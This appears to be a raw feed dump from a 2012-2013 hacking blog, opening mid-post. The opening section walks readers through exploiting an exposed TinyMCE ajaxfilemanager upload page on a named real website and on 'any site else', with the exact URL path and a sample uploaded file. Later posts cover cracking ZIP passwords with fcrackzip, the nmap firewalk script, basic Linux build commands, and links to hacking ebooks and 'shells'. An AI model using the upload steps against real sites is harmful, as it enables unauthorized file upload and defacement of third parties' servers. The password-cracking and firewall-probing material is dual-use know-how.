<a href="http://www.consolvant.com/images/CB062423.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="http://www.consolvant.com/images/CB062423.jpg" border="0" class="decoded" height="200" src="http://www.consolvant.com/images/CB062423.jpg" width="133" /></a><span style="font-size: small;"><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><br style="background-color: whitesmoke; line-height: 18px; text-align: justify;" /><a href="http://www.isfa.org.uk/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/langs/" target="_blank"><span class="Apple-style-span">http://www.isfa.org.uk/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/langs/</span></a></span></span>
<span style="font-size: small;"><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;">or any site else ...</span></span>
<span style="font-size: small;"><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;">Now Put <span class="Apple-style-span" style="color: red;">ajaxfilemanager/ajaxfilemanager.php</span> after<span class="Apple-style-span" style="color: red;"> /plugins/</span> in url </span></span><br />
<br />
<span style="font-size: small;"><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;">Exemple : <a href="http://www.isfa.org.uk/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php" target="_blank">http://www.isfa.org.uk/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php</a></span></span><br />
<br />
<span style="font-size: small;"><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;">now <span style="font-size: small;">you can <span style="font-size: small;">upload </span></span></span></span><br />
<span style="font-size: small;"><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="font-size: small;">Exemple Upload Result : </span></span></span></span><br />
<span style="font-size: small;"><span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="font-size: small;"><a href="http://www.isfa.org.uk/tinymce/uploaded/benz.txt" target="_blank">http://www.isfa.org.uk/tinymce/uploaded/benz.txt</a> </span></span> </span></span></div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-26263354589667435672013-01-24T03:24:00.001-08:002013-01-24T03:24:16.400-08:00fcrack protected ZIP<div dir="ltr" style="text-align: left;" trbidi="on">
<ins style="border: none; display: inline-table; height: 280px; margin: 0; padding: 0; position: relative; visibility: visible; width: 336px;"><ins id="aswift_1_anchor" style="border: none; display: block; height: 280px; margin: 0; padding: 0; position: relative; visibility: visible; width: 336px;"></ins></ins>
<div class="separator" style="clear: both; font-family: inherit; text-align: center;">
<a href="http://www.ehacking.net/2011/03/how-to-crack-password-protected-zip.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFLNJpxW6moR0qyMV_rHqm0Nu0w1TzrQI5ziuh07Iy5ccsglJCRAheY-diZ1jrJ2VeNtwoIluHRTdO6-T3JcgiDX5yjJxxggndmmt5dIFT4kHkya_AsGSJdDozb44G3SgZPIJg6qhMznE/s200/winzip.png" width="200" /></a><span style="font-size: x-small;"></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b>People using Zip to compress their files beside compression they are trying to lock their important data with password(s).</b></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b>Now
let suppose if you do this same thing with your important files and now
you have forgotten password, now what to do now its time to crack it.</b></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b>This article will teach you how to crack the password of Zip files.</b></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b><br />
</b></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b><br />
</b></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b><a href="http://www.blogger.com/blogger.g?blogID=3442683768255841191" name="more"></a>For
this purpose we will use Linux based operating system and a tool
FCrackZip for this purpose, FCrackZip is a fast and free-ware tool and
it is easy to use Zip cracker tool it is similar to fzc and zipcrack. It
has been written in assembler and it uses <a href="http://www.ehacking.net/2011/02/password-based-attack-thc-hydra.html">brute force</a> and <a href="http://www.ehacking.net/2011/02/password-based-attack-thc-hydra.html">dictionary</a> based attack to crack or find-out the passwords.</b></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b>By
using a simple Linux terminal and command you can easily crack the Zip
password, you can download FCrackZip from your software manager.</b></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b><br />
</b></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b>Use this command to get FCrackZip from terminal</b></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b><i style="color: red;">$ sudo apt-get install fcrackzip</i></b></span></div>
<div style="font-family: inherit;">
<br />
</div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b><span style="color: red;"><span style="color: black;">After installing </span></span>this you have options to attack on your zip file, either choose <a href="http://www.ehacking.net/2011/02/password-based-attack-thc-hydra.html">brute force attack or dictionary attack.</a> </b></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b>Here is the simple usage example.</b></span></div>
<div style="font-family: inherit;">
<b style="color: red;"><i>$ fcrackzip -v -b -p wordlistfile.txt -u your_zip_file.zip</i></b><span style="font-size: x-small;"></span></div>
<br />
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b><br />
</b></span></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b><br />
</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUKfUwx5cursPzc20xDAAGyygE0p3xs1NtMUhJh5Bmd0aQA9QzY-AifJqFBu8gMKjLI5vtczQJ0Ft_hPgH9I6tazw-cW5riYsGFlxGi1UOWul2aRZRvEpx7FOlQht1G3_196k0lbpvK6w/s1600/crack-zip-password-linux.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUKfUwx5cursPzc20xDAAGyygE0p3xs1NtMUhJh5Bmd0aQA9QzY-AifJqFBu8gMKjLI5vtczQJ0Ft_hPgH9I6tazw-cW5riYsGFlxGi1UOWul2aRZRvEpx7FOlQht1G3_196k0lbpvK6w/s400/crack-zip-password-linux.jpg" width="400" /></a></div>
<div style="font-family: inherit;">
<span style="font-size: x-small;"><b><br />
</b></span></div>
<span style="font-size: x-small;"><b>By
looking the above picture you can easily see the brute force attack
against a zip file that is password protected, it took around 30 minutes
to find the password for this zip.</b></span></div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-41065581345320707372013-01-19T07:37:00.004-08:002013-01-19T07:37:53.421-08:00Linux 101 hacks eBook<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC_E15ABKj7iActGBLF8RaNAUcpIoXtktvc5si0x-OjLnAg96YrJsQRKYnpfJ5EjHoq4luCh9dHMrL89eY9KJzEziTgSdZCBJ4iL1Fy_0eKcMCMNRsKhPUrcN0Caf8CBGz516FOq4Ee-o/s1600/linux-101-hacks-2nd-medium.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC_E15ABKj7iActGBLF8RaNAUcpIoXtktvc5si0x-OjLnAg96YrJsQRKYnpfJ5EjHoq4luCh9dHMrL89eY9KJzEziTgSdZCBJ4iL1Fy_0eKcMCMNRsKhPUrcN0Caf8CBGz516FOq4Ee-o/s320/linux-101-hacks-2nd-medium.png" width="226" /></a></div>
You can download this book free from Root Developper .<br />
Download is on new books catagory : <a href="http://root-dev.zzl.org/" target="_blank">http://root-dev.zzl.org/</a><br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-85467381775500943602013-01-18T05:46:00.003-08:002013-01-18T05:46:49.855-08:00Root Developper<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5zII2fqIzx1YVuten9ORGb5ObaNzvc0SYPKDdO-mf9D9fg6MPLfjmNUSNc_6XXaUYg3EG9NYJsOFinrip3Hc_JthwVK54O1G3ACy9pyLqH8FrIbjZiyMc0PN9O00HeIFqNoI2AW1dDAU/s1600/avatar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5zII2fqIzx1YVuten9ORGb5ObaNzvc0SYPKDdO-mf9D9fg6MPLfjmNUSNc_6XXaUYg3EG9NYJsOFinrip3Hc_JthwVK54O1G3ACy9pyLqH8FrIbjZiyMc0PN9O00HeIFqNoI2AW1dDAU/s1600/avatar.png" /></a></div>
We have creat new website Root Developper .<br />
You can get : New Scripts , New Books / eBooks , New Shells , New Tutorials About Linux , Systems Linux . Come Come Come Visit <a href="http://www.root-dev.zzl.org/" target="_blank">www.root-dev.zzl.org</a> .<br />
Facebook Fan Page : <a href="https://www.facebook.com/root.develop" target="_blank">Root Developper</a><br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-52687683395759410602013-01-18T02:56:00.001-08:002013-01-18T02:59:31.754-08:00All Commands Uncompress<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGRhZ1wnAvDwyr_obajcpDiszjZHweeMjb4j5GnkuTNcXzMgJ8YXABVuve_F0PnBa5qoHjHb5UZbvlXYfvuQSkFzoCR0ZOIgrfTUG9jZh4Qz_6gS0ZBFWK8dbz83LWGQ6RY6pnlY4U2vY/s1600/542235_4120723016738_1412437592_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGRhZ1wnAvDwyr_obajcpDiszjZHweeMjb4j5GnkuTNcXzMgJ8YXABVuve_F0PnBa5qoHjHb5UZbvlXYfvuQSkFzoCR0ZOIgrfTUG9jZh4Qz_6gS0ZBFWK8dbz83LWGQ6RY6pnlY4U2vY/s1600/542235_4120723016738_1412437592_n.jpg" /></a></div>
<br />
<span data-ft="{"tn":"K"}" id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2]"><span class="UFICommentBody" id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0"><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[0]"><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[0].[0]">1: Uncompress tarball</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[0].[1]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[0].[2]"> </span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[0].[3]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[0].[4]">To uncompress them, execute the following command(s) depending on the extension:</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[0].[5]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[0].[6]">root@bt: tar -zxvf file.tar.gz</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[0].[7]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[0].[8]">root@bt: tar- zxf file.tgz</span></span><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3]"><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0"><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[0]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[1]">root@bt: tar -jxf file.tar.bz2</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[2]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[3]"> root@bt: tar -jxf file.tbz2</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[4]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[5]"> </span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[6]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[7]">Now change directory</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[8]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[9]">root@bt: ls</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[10]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[11]">root@bt: cd path-to-software/</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[12]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[13]"> </span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[14]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[15]">2: Build and install software</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[16]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[17]"> </span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[18]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[19]">Generally you need to type 3 commands as follows for building and compiling software:</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[20]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[21]">root@bt:# ./configure</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[22]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[23]">root@bt:# make</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[24]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[25]">root@bt:# make install</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[26]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[27]"> </span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[28]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[29]">Where,</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[30]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[31]"> </span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[32]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[33]">
./configure will configure the software to ensure your system has
the necessary functionality and libraries to successfully compile the
package</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[34]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[35]"> make will compile all the source files into executable binaries.</span><br id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[36]" /><span id=".reactRoot[693].[1][2][1]{comment315868228525573_315868348525561}.0.[1].0.[1].0.[0].[0][2].0.[3].0.[37]"> Finally, make install will install the binaries and any supporting files into the appropriate locations.</span></span></span></span></span></div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-29582003438069261332013-01-10T12:15:00.002-08:002013-01-10T12:15:35.062-08:00Archlinux <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="box">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgeQUTgg1NjFsjwIZQXir2ywPXJqWHEkXc8fOOHEhNuIaFoDpJl7lKnd-y06KL-UKHpUYxNslPZNQM5xvuQ3A1S_k_lVpAU6QYW1_3sukIs-0fGcgX6TXmuT6nOc-U9FaDiiKXVJveQe4/s1600/capture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgeQUTgg1NjFsjwIZQXir2ywPXJqWHEkXc8fOOHEhNuIaFoDpJl7lKnd-y06KL-UKHpUYxNslPZNQM5xvuQ3A1S_k_lVpAU6QYW1_3sukIs-0fGcgX6TXmuT6nOc-U9FaDiiKXVJveQe4/s640/capture.png" width="640" /></a></div>
<h2 class="title">
</h2>
<h2 class="title">
About Arch Linux</h2>
Arch Linux is an independently developed, i686/x86-64 general purpose GNU/Linux
distribution versatile enough to suit any role. Development focuses on
simplicity, minimalism, and code elegance. Arch is installed as a
minimal base system, configured by the user upon which their own ideal
environment is assembled by installing only what is required or desired
for their unique purposes. GUI configuration utilities are not officially
provided, and most system configuration is performed from the shell by editing
simple text files. Arch strives to stay bleeding edge, and typically offers
the latest stable versions of most software.
<br />
Arch Linux uses its own Pacman package manager, which couples simple binary
packages with an easy-to-use package build system. This allows users to
easily manage and customize packages ranging from official Arch software to the
user's own personal packages to packages from 3rd party sources. The repository
system also allows users to easily build and maintain their own custom build
scripts, packages, and repositories, encouraging community growth and
contribution.
<br />
The minimal Arch base package set resides in the streamlined [core] repository.
In addition, the official [extra], [community], and [testing] repositories
provide several thousand high-quality, packages to meet your software demands.
Arch also offers an [unsupported] section in the Arch Linux User Repository
(AUR), which contains over 9,000 build scripts, for compiling installable
packages from source using the Arch Linux makepkg application.
<br />
Arch Linux uses a "rolling release" system which allows one-time installation
and perpetual software upgrades. It is not generally necessary to reinstall
or upgrade your Arch Linux system from one "version" to the next.
By issuing one command, an Arch system is kept up-to-date and on the bleeding
edge.
<br />
Arch strives to keep its packages as close to the original upstream software as
possible. Patches are applied only when necessary to ensure an application
compiles and runs correctly with the other packages installed on an up-to-date
Arch system.
<br />
To summarize: Arch Linux is a versatile, and simple distribution designed to
fit the needs of the competent Linux® user. It is both powerful and easy
to manage, making it an ideal distro for servers and workstations. Take it in
any direction you like. If you share this vision of what a GNU/Linux
distribution should be, then you are welcomed and encouraged to use it freely,
get involved, and contribute to the community. Welcome to Arch!<br />
Download <a href="https://www.archlinux.org/download/">https://www.archlinux.org/download/</a> <br />
</div>
</div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-10685018184863434822013-01-05T03:43:00.002-08:002013-01-05T03:46:28.832-08:00FireWalk<div dir="ltr" style="text-align: left;" trbidi="on">
<div id="content">
<h1>
File <code>firewalk</code></h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_3y7AJWJNuW16ytsXi92g2PPaKIcmKCbpFHFJs26HtbP73LVDrMwIh2251LGiiXIbZ-G0oComJIMJHMMThH6Uudnw__7NMiMYpeZErVYODKzfyDoVzMMp3BHnvfutfM1A5lgndJEujEw/s1600/firewalk+example2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_3y7AJWJNuW16ytsXi92g2PPaKIcmKCbpFHFJs26HtbP73LVDrMwIh2251LGiiXIbZ-G0oComJIMJHMMThH6Uudnw__7NMiMYpeZErVYODKzfyDoVzMMp3BHnvfutfM1A5lgndJEujEw/s640/firewalk+example2.jpg" width="640" /></a></div>
<br />
<a href="http://nmap.org/book/nse-script-format.html#nse-format-rules">Script types</a>:
hostrule
<br />
Categories:
<i><a href="http://nmap.org/nsedoc/categories/safe.html">safe</a></i>, <i><a href="http://nmap.org/nsedoc/categories/discovery.html">discovery</a></i>
<br />
Download: <a href="http://nmap.org/svn/scripts/firewalk.nse">http://nmap.org/svn/scripts/firewalk.nse</a>
<br />
<h2>
User Summary </h2>
Tries to discover firewall rules using an IP TTL expiration technique known
as firewalking.
<br />
To determine a rule on a given gateway, the scanner sends a probe to a metric
located behind the gateway, with a TTL one higher than the gateway. If the probe
is forwarded by the gateway, then we can expect to receive an ICMP_TIME_EXCEEDED
reply from the gateway next hop router, or eventually the metric itself if it is
directly connected to the gateway. Otherwise, the probe will timeout.
<br />
It starts with a TTL equals to the distance to the target. If the probe timeout,
then it is resent with a TTL decreased by one. If we get an ICMP_TIME_EXCEEDED,
then the scan is over for this probe.
<br />
Every "no-reply" filtered TCP and UDP ports are probed. As for UDP scans, this
process can be quite slow if lots of ports are blocked by a gateway close to the
scanner.
<br />
Scan parameters can be controlled using the <code>firewalk.*</code>
optional arguments.
<br />
From an original idea of M. Schiffman and D. Goldsmith, authors of the
firewalk tool.<br />
<h2>
Script Arguments </h2>
<br />
<h4>
firewalk.max-probed-ports </h4>
maximum number of ports to probe per protocol. Set to -1 to scan every filtered port.<br />
<h4>
firewalk.max-retries </h4>
the maximum number of allowed retransmissions.<br />
<h4>
firewalk.recv-timeout </h4>
the duration of the packets capture loop (in milliseconds).<br />
<h4>
firewalk.max-active-probes </h4>
maximum number of parallel active probes.<br />
<h4>
firewalk.probe-timeout </h4>
validity period of a probe (in milliseconds).<br />
<h2>
Example Usage </h2>
<br />
<ul>
<li><pre>nmap --script=firewalk --traceroute <host>
</pre>
</li>
<li><pre>nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>
</pre>
</li>
<li><pre>nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>
</pre>
</li>
<li><pre>nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7 <host>
</pre>
</li>
</ul>
<h2>
Script Output </h2>
<pre>| firewalk:
| HOP HOST PROTOCOL BLOCKED PORTS
| 2 192.168.1.1 tcp 21-23,80
| udp 21-23,80
| 6 10.0.1.1 tcp 67-68
| 7 10.0.1.254 tcp 25
|_ udp 25
</pre>
<h2>
Requires </h2>
<ul>
<li><a href="http://nmap.org/nsedoc/lib/bin.html">bin</a></li>
<li><a href="http://nmap.org/nsedoc/scripts/firewalk.html">math</a></li>
<li><a href="http://nmap.org/nsedoc/lib/nmap.html">nmap</a></li>
<li><a href="http://nmap.org/nsedoc/lib/packet.html">packet</a></li>
<li><a href="http://nmap.org/nsedoc/lib/stdnse.html">stdnse</a></li>
<li><a href="http://nmap.org/nsedoc/lib/tab.html">tab</a></li>
<li><a href="http://nmap.org/nsedoc/scripts/firewalk.html">table</a></li>
</ul>
<hr />
<b>Author: </b>Henri Doreau<br />
<b>License: </b> Same as Nmap--See <a href="http://nmap.org/book/man-legal.html">http://nmap.org/book/man-legal.html</a><br />
<h2>
<span style="color: red;">action</span> </h2>
<dl class="function">
<dt><a href="http://www.blogger.com/blogger.g?blogID=3442683768255841191" name="action"></a><b>action</b> (host)</dt>
<dd>firewalk entry point<br />
<h3>
Parameters</h3>
<ul>
<li>
host:
</li>
</ul>
</dd></dl>
<h2>
<span style="color: blue;">hostrule</span> </h2>
<dl class="function">
<dt><a href="http://www.blogger.com/blogger.g?blogID=3442683768255841191" name="hostrule"></a><b>hostrule</b> (host)</dt>
<dd>host rule, check for requirements before to launch the script<br />
<h3>
Parameters</h3>
<ul>
<li>
host:
</li>
</ul>
</dd></dl>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-37310249244049326032012-12-22T02:27:00.001-08:002012-12-22T02:27:19.636-08:00Free eBooks Pentration Testing and Hacking<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Free books uploaded on youtube by benz</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTgmR3-OAXSr1v8d40U0lRJvG9oCQOxwznxTM5GiQcMk_CxEtEgk_PN-8mdMw3N08vlKcthgIBn6Ch6cQmgu1bDpx3as5lbB8DbBh22wWZ8XtxxuW7l5en5ukSGBSMW1kiATtQHNxnmHg/s1600/HackingPolitics_CVR1small.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTgmR3-OAXSr1v8d40U0lRJvG9oCQOxwznxTM5GiQcMk_CxEtEgk_PN-8mdMw3N08vlKcthgIBn6Ch6cQmgu1bDpx3as5lbB8DbBh22wWZ8XtxxuW7l5en5ukSGBSMW1kiATtQHNxnmHg/s320/HackingPolitics_CVR1small.jpg" width="259" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<a href="http://youtu.be/8t1tzoRmogs" target="_blank">you can download from HERe!</a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
please don't forget subscribe on my chanel : <a href="http://www.youtube.com/user/islam2012ish">Islam Benz</a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Fb fan page :<a href="https://www.facebook.com/BackTrack.linuxr3">https://www.facebook.com/BackTrack.linuxr3</a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
AND OTHER NICE BOOK you can Read online : <a href="http://books.google.dz/books?id=XifatoD0IL8C&pg=PT1&dq=gray+hat+ethical+guide+to+hacking&hl=en&ei=4icUTfqwHoT78Abb0fjzDQ&sa=X&oi=book_result&ct=result&redir_esc=y#v=onepage&q=gray%20hat%20ethical%20guide%20to%20hacking&f=false">gray hat ethical guide to hacking</a></div>
<div style="text-align: center;">
<img height="320" src="http://img.docstoccdn.com/thumb/orig/71859080.png" width="235" /></div>
<div style="text-align: center;">
<br /></div>
</div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-31627917626691024492012-12-02T06:14:00.000-08:002012-12-02T06:15:29.728-08:00Anonymous-OS !!!!<div dir="ltr" style="text-align: left;" trbidi="on">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
